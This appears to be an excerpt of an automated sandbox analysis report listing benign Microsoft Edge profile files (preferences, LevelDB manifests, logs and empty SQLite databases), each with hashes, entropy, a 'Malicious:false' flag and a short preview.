                                                                                                                                                      SSDEEP:768:h8s573LWPd5fYI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVOHBpYrwGtmDdKpituB:h8s573LWPd5fYIu1jaxhpJGtEft2
                                                                                                                                                      MD5:DC03A5841FD8437CEBE1081579B9A7C1
                                                                                                                                                      SHA1:CBD240D1023F955AE49E914B28D97D375D2D4331
                                                                                                                                                      SHA-256:A9CBDCC1AB3ABEDF921571ECDB6ACB677F25477C1A0E26C5610BB4663E51D07A
                                                                                                                                                      SHA-512:C117BED418E818FB5951B029D402E44C5D436B117E53FF7BE1C26E97A29771FB7E349D108B4B6EA707DB127328AEFE425EAD5A03172D262FEBE13872BED1B7F9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790691749887","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790691749887","location":5,"ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):1695826
                                                                                                                                                      Entropy (8bit):5.04114306350844
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:MPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:MPfZ/mS5
                                                                                                                                                      MD5:1CAC9A45500E10909295CF1713876D0F
                                                                                                                                                      SHA1:BD2D42AAEB28B16335EB3F7BB97E372118CF5291
                                                                                                                                                      SHA-256:FAA1894D551129571CF8D2733B49AA8368D57937CA82D41D9F16BFEF5C5442FB
                                                                                                                                                      SHA-512:8DA61C087794B554602E8B8B9C8FA91C24D12A85B7AD2C366223225BF0ECF829AD503101C3D0DEA9E8C27FE09FC4349776174B994C60F2324D76C25FF51A7236
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...m.................DB_VERSION.19."..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13377790699857835.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].....................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13377790699858535.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):293
                                                                                                                                                      Entropy (8bit):5.140689132727321
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjFxcQ4M1wkn23oH+Tcwt9Eh1ZB2KLlJjr0jIq2Pwkn23oH+Tcwt9Eh1tIFUv:X34rfYeb9Eh1ZFLb0jIvYfYeb9Eh16F2
                                                                                                                                                      MD5:F02ADA57496ABE7176D09996732BECDE
                                                                                                                                                      SHA1:BFA21ED0E0AA345EC1A02B3DAB314034E3B2664E
                                                                                                                                                      SHA-256:259CDFE70ED37B1B7B1C276F2717E26BF0C8A1D79F10F0219987ED83FFA07994
                                                                                                                                                      SHA-512:959C9408743ABBB436BAA07D0361D811B7BF50C766DA2FCAD3D81DFED0048B506CCE0A4FAC8F91D8C84576D0F36A9E70C153A74D7AD3EF98DC9C84632A55EFAB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:17.689 2184 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2024/12/04-07:58:17.723 2184 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):12288
                                                                                                                                                      Entropy (8bit):0.3202460253800455
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                      MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                      SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                      SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                      SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):28672
                                                                                                                                                      Entropy (8bit):0.43508159006069336
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                      MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                      SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                      SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                      SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):262512
                                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:LsNlz7ct:Ls3Xct
                                                                                                                                                      MD5:6CE887635A8FD8ED2D923D433650E163
                                                                                                                                                      SHA1:7EBA9C49CDB082207F66B4C6815C06873794872D
                                                                                                                                                      SHA-256:49A69AF0419F82FC12AA220F5778DD707C3903AA5B1524923655FE279311D819
                                                                                                                                                      SHA-512:4D0D4B03D0BDB7A8B1A528E61F4D4F8E2BE65A0E631AF28807CDBF3AFBCFC57F52420DE563C1F12A0D6CE7B062DB27397844E4556C779660E5125B80E3EAD155
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.........................................1..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):33
                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...m.................DB_VERSION.1
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):305
                                                                                                                                                      Entropy (8bit):5.214005028908504
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jj31wkn23oH+TcwtnG2tbB2KLlJj9mQyq2Pwkn23oH+TcwtnG2tMsIFUv:efYebn9VFLNmVvYfYebn9GFUv
                                                                                                                                                      MD5:287B0516B6ADD042B4CB76169D00A9CC
                                                                                                                                                      SHA1:938B6470124BAB4CFC313C6381C2E51561765B9A
                                                                                                                                                      SHA-256:7E93823EF0A24A474E1329BBFF0864483E5CEF7001B3EF9F4996814BE3477FE8
                                                                                                                                                      SHA-512:690F0289E29788AF78558C67442C7DF369FF75ED608D5D73A1F54DBD07128D7916F6632966406D01FFBEFBC7D9CF2E90637628097BE49B5A0BD59349503935E9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.752 1f30 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/04-07:58:11.877 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.494709561094235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                      MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                      SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                      SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                      SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.613855261003843
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWKKuMAq/Wc:TLqpR+DDNzWjJ0npnyXKUO8+jKupXmL
                                                                                                                                                      MD5:ED9F0986E0B8BF9AE4722E557E1D3310
                                                                                                                                                      SHA1:8DECE83BABA21617CDF09E021EB58ABC3DBB0FCB
                                                                                                                                                      SHA-256:AC69A467C47E7DF47E03B7C91E8FA964A1E32BB52E55A8A31C72623A38D7A5AB
                                                                                                                                                      SHA-512:60D719CC2AC9EF0821CF07C0246573D64511489FA99FF1B4DFCE28EC7F7E0B0312D004DB988F2D4171F517EC7CA287B81FAB485F96BA3719726A149113CB0713
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):375520
                                                                                                                                                      Entropy (8bit):5.354067655658623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:oA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:oFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                      MD5:56FFAAFEF80750874CFA95B349845E6A
                                                                                                                                                      SHA1:743AF29FF1C647D2A00DCB4FC451AE3A4BB63637
                                                                                                                                                      SHA-256:246B66B417C0F73CFED0EE20EEC404B725035962D5902226E2A208011E2E1F24
                                                                                                                                                      SHA-512:FC397D749F0EAA187DEFA463302E1B9086B93781773FF19751B7C066FEA16FCB28551F50706E23E0C4DF8B103D865A8E823FEED962F3FA0775913EA95342FA3A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...m.................DB_VERSION.1-?.1q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13377790699885440..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):309
                                                                                                                                                      Entropy (8bit):5.205243437311235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjFDB1wkn23oH+Tcwtk2WwnvB2KLlJjeQ+q2Pwkn23oH+Tcwtk2WwnvIFUv:BkfYebkxwnvFLT+vYfYebkxwnQFUv
                                                                                                                                                      MD5:93C2F5E9402824FA60207C32ACCDDDA4
                                                                                                                                                      SHA1:643672A97067B483C783B135C525AE368DA70FF3
                                                                                                                                                      SHA-256:56D6D77647965378F3044EC01DA29DD6E2F304EC9D97BB8C0F24C6B77B7A40D7
                                                                                                                                                      SHA-512:ED15B7BBDE2BF4A166C1E30D8F70BF709E0079756D1BB1E3B260771747584D638A5825B20A63FA62E953C9C310DA0758A0CF2D9C68DFC0CD6614B2AC9D98AEFC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:17.664 21dc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/04-07:58:17.987 21dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
